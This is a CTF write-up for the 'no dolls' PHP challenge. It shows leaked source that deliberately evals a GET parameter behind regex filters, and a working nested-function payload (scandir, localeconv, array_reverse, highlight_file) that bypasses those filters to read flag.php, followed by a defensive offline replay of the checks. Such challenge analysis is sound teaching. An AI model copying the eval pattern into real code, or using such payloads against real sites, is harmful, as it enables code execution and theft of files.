Buuctf-[gxyctf2019] no dolls (xiaoyute detailed explanation)
2022-07-06 06:00:00 【Xiaoyute detailed explanation】
Let's look at the challenge first.
The page itself gives no useful information. Scanning with dirsearch first found nothing useful either. At that point I suspected a Git leak, and running GitHack against the site recovered index.php.
Here is the source code:
<?php
include "flag.php";
echo "flag Where is it ?<br>";
if(isset($_GET['exp'])){
    // A parameter named exp must be passed via GET. If all the checks below pass, its content is executed.
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        // Several common pseudo-protocols (stream wrappers) are filtered, so they cannot be used to read the file.
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            // (?R) references the whole pattern recursively, and the trailing ? makes that recursion optional.
            // Only calls whose argument is empty or another such call can match.
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // This regex blocks keywords such as et, na and info, so many functions cannot be used.
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die(" It's a little bit close to !");
            }
        }
        else{
            die(" Think about it !");
        }
    }
    else{
        die(" Still want to read flag, Smelly brother !");
    }
}
// highlight_file(__FILE__);
?>
The key check is
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))
Here (?R) references the current expression, so the whole pattern is applied recursively, and the ? after it allows the recursion to be absent.
Therefore exp must have the form a(b()); to pass.
From the source code we know that the flag is in flag.php, so we just need a way to read it.
The scandir() function lists the files in the current directory:
<?php
print_r(scandir('.'));
?>
So we need to construct the equivalent of scandir('.') using only calls that pass the filter.
Two functions are used for this:
localeconv() returns an array of local numeric and currency formatting information, and the first item in that array is ".".
current() returns the current element of an array, which by default is the first value.
Note that
current(localeconv()) is always a dot.
First step:
?exp=print_r(scandir(current(localeconv())));
Here we need to read the second-to-last element of the array.
Two more functions are used for this:
next(): moves the array's internal pointer to the next element and returns it.
array_reverse(): returns the array with its elements in reverse order.
Final payload:
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
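The three checks in index.php can be replayed offline, without eval(), to see which one stops a given input. This is an added example, not part of the original write-up: classify() and the sample strings are constructed for illustration, and '' stands in for the NULL replacement argument used in the source.

```php
<?php
// Added example: replays the checks from index.php in order and reports
// which one rejects an input. Nothing is ever passed to eval().
// classify() is a hypothetical helper name, not part of the challenge.

function classify(string $exp): string
{
    // Check 1: blacklist of stream wrappers (pseudo-protocols).
    if (preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $exp)) {
        return 'rejected by check 1 (wrapper blacklist)';
    }

    // Check 2: remove every name(...) whose argument is empty or another
    // such call. Only a bare ";" may be left, so literal arguments fail.
    $rest = preg_replace('/[a-z,_]+\((?R)?\)/', '', $exp);
    if ($rest !== ';') {
        return 'rejected by check 2 (left over: ' . var_export($rest, true) . ')';
    }

    // Check 3: substring blacklist applied to the whole input.
    if (preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $exp, $m)) {
        return "rejected by check 3 (contains '{$m[0]}')";
    }

    return 'accepted by all three checks';
}

// Constructed sample inputs, one per outcome.
$samples = [
    "readfile('php://stdin');",                  // wrapper string
    "readfile('flag.php');",                     // literal argument
    'a(b(),c());',                               // more than one argument
    'phpinfo();',                                // blacklisted substring
    'file_get_contents(a());',                   // blacklisted substring
    'a(b());',                                   // shape the filter expects
    'print_r(scandir(current(localeconv())));',  // first step from the page
];

foreach ($samples as $s) {
    printf("%-44s => %s\n", $s, classify($s));
}
```

Any string reported as accepted is handed to eval() by the original script, so the durable fix is to stop evaluating request data and to keep the .git directory out of the web root rather than to extend the blacklists.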